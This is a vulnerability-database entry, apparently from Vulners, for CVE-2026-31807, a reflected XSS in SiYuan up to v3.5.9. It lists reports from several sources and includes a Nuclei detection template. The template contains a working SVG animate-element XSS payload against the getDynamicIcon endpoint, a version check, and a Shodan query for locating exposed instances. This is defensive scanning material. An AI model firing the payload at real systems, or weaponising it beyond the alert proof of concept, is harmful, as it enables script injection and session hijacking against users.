| Reporter | Title | Published | Views | Family All 126 |
|---|---|---|---|---|
| CVE-2026-31807 | 10 Mar 202620:56 | – | attackerkb | |
| CVE-2026-31807 | 9 Mar 202608:07 | – | circl | |
| SiYuan 跨站脚本漏洞 | 10 Mar 202600:00 | – | cnnvd | |
| CVE-2026-31807 | 10 Mar 202620:56 | – | cve | |
| CVE-2026-31807 SiYuan has a SVG Sanitizer Bypass via `<animate>` Element — Unauthenticated XSS | 10 Mar 202620:56 | – | cvelist | |
| EUVD-2026-10892 | 10 Mar 202623:49 | – | euvd | |
| EUVD-2026-10893 | 10 Mar 202623:49 | – | euvd | |
| SiYuan has a SVG Sanitizer Bypass via `<animate>` Element — Unauthenticated XSS | 10 Mar 202623:49 | – | github | |
| CVE-2026-31807 | 10 Mar 202621:16 | – | nvd | |
| CVE-2026-31807 SiYuan has a SVG Sanitizer Bypass via `<animate>` Element — Unauthenticated XSS | 10 Mar 202620:56 | – | osv |
id: CVE-2026-31807
info:
name: SiYuan <= v3.5.9 - SVG Animate Element XSS
author: 0x_Akoko
severity: medium
description: |
SiYuan <= v3.5.9 contains a reflected XSS caused by insufficient SVG sanitization allowing SVG animation elements to inject executable JavaScript in /api/icon/getDynamicIcon endpoint, letting unauthenticated attackers execute scripts.
impact: |
Unauthenticated attackers can execute arbitrary JavaScript, leading to session hijacking or other client-side attacks.
remediation: |
Update to version 3.5.10 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-5hc8-qmg8-pw27
- https://nvd.nist.gov/vuln/detail/CVE-2026-31807
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
cvss-score: 6.1
cve-id: CVE-2026-31807
epss-score: 0.00445
epss-percentile: 0.35754
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: siyuan-note
product: siyuan
shodan-query: http.favicon.hash:-1450125239
tags: cve,cve2026,siyuan,xss,svg,reflected,unauth
flow: http(1) && http(2)
http:
- method: POST
path:
- "{{BaseURL}}/api/system/version"
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'compare_versions(ver, ">= 0.0.1", "<= 3.5.9")'
condition: and
extractors:
- type: json
name: ver
internal: true
json:
- '.data'
- method: GET
path:
- "{{BaseURL}}/api/icon/getDynamicIcon?type=8&content=%3C%2Ftext%3E%3Ca%3E%3Canimate+attributeName%3D%22href%22+values%3D%22javascript%3Aalert%28document.domain%29%22+begin%3D%220s%22+fill%3D%22freeze%22%2F%3E%3Ctext+x%3D%2250%25%22+y%3D%2280%25%22+fill%3D%22red%22+style%3D%22font-size%3A60px%22%3EClick+me%3C%2Ftext%3E%3C%2Fa%3E%3Ctext%3E&color=blue"
matchers:
- type: word
part: response
words:
- '<animate attributeName="href" values="javascript:alert(document.domain)" begin="0s" fill="freeze"/>'
- 'id="dynamic_icon_type8'
condition: and
- type: word
part: content_type
words:
- "image/svg+xml"
- type: status
status:
- 200
# digest: 4b0a00483046022100c5b29db70d742d1ab636b283611268d2a5b04078c1df9d539302ec9f416baf27022100a59f1771953995fd1165b6efdb4bce024f1df258f16c9d197e907dcb73b0ce91:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation